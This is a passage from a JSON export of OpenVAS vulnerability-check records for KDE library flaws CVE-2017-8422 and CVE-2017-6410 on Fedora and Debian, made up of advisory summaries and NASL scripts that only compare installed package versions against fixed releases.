script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kf5-kauth FEDORA-2017-6bdbf57f29\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kf5-kauth'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kf5-kauth on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-6bdbf57f29\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4CTHBM3NE57G5QF6GOXPOGMMSTYOAUIP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kf5-kauth\", rpm:\"kf5-kauth~5.33.0~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:57:33", "description": "Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410 \nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422 \nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.", "cvss3": {}, "published": "2017-05-12T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3849-1 (kde4libs - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422", "CVE-2017-6410"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703849", "href": "http://plugins.openvas.org/nasl.php?oid=703849", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3849.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3849-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703849);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-6410\", \"CVE-2017-8422\");\n script_name(\"Debian Security Advisory DSA 3849-1 (kde4libs - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-05-12 00:00:00 +0200 (Fri, 12 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3849.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"kde4libs on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 4:4.14.2-5+deb8u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.14.26-2.\n\nWe recommend that you upgrade your kde4libs packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410 \nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422 \nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kdelibs5-data\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kdelibs5-dbg\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kdelibs5-dev\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kdelibs5-plugins\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kdoctools\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkcmutils4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkde3support4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdeclarative5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdecore5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdesu5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdeui5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdewebkit5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkdnssd4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkemoticons4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkfile4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkhtml5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkidletime4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkimproxy4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkio5\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkjsapi4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkjsembed4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkmediaplayer4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libknewstuff2-4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libknewstuff3-4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libknotifyconfig4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkntlm4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkparts4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkprintutils4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkpty4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrosscore4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrossui4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libktexteditor4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkunitconversion4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkutils4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnepomuk4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnepomukquery4a\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnepomukutils4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libplasma3\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsolid4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libthreadweaver4\", ver:\"4:4.14.2-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:34:09", "description": "Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422\nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.", "cvss3": {}, "published": "2017-05-12T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3849-1 (kde4libs - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422", "CVE-2017-6410"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703849", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703849", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3849.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3849-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703849\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2017-6410\", \"CVE-2017-8422\");\n script_name(\"Debian Security Advisory DSA 3849-1 (kde4libs - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-12 00:00:00 +0200 (Fri, 12 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3849.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"kde4libs on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 4:4.14.2-5+deb8u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.14.26-2.\n\nWe recommend that you upgrade your kde4libs packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422\nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"kdelibs5-data\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"kdelibs5-dbg\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"kdelibs5-dev\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"kdelibs5-plugins\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"kdoctools\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkcmutils4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkde3support4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdeclarative5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdecore5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdesu5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdeui5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdewebkit5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkdnssd4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkemoticons4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkfile4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkhtml5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkidletime4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkimproxy4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkio5\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkjsapi4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkjsembed4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkmediaplayer4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libknewstuff2-4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libknewstuff3-4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libknotifyconfig4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkntlm4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkparts4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkprintutils4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkpty4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkrosscore4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkrossui4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libktexteditor4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkunitconversion4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libkutils4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnepomuk4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnepomukquery4a\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnepomukutils4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libplasma3\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsolid4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libthreadweaver4\", ver:\"4:4.14.2-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:08:03", "description": "Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\nIt was discovered that KIO would show web authentication\ncredentials in some error cases.", "cvss3": {}, "published": "2018-01-25T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for kde4libs (DLA-952-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2074", "CVE-2017-8422", "CVE-2017-6410"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310890952", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890952", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890952\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2013-2074\", \"CVE-2017-6410\", \"CVE-2017-8422\");\n script_name(\"Debian LTS: Security Advisory for kde4libs (DLA-952-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-25 00:00:00 +0100 (Thu, 25 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00023.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"kde4libs on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4:4.8.4-4+deb7u3.\n\nWe recommend that you upgrade your kde4libs packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in kde4libs, the core libraries\nfor all KDE 4 applications. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-6410\n\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the\ncaller and gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\nIt was discovered that KIO would show web authentication\ncredentials in some error cases.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = 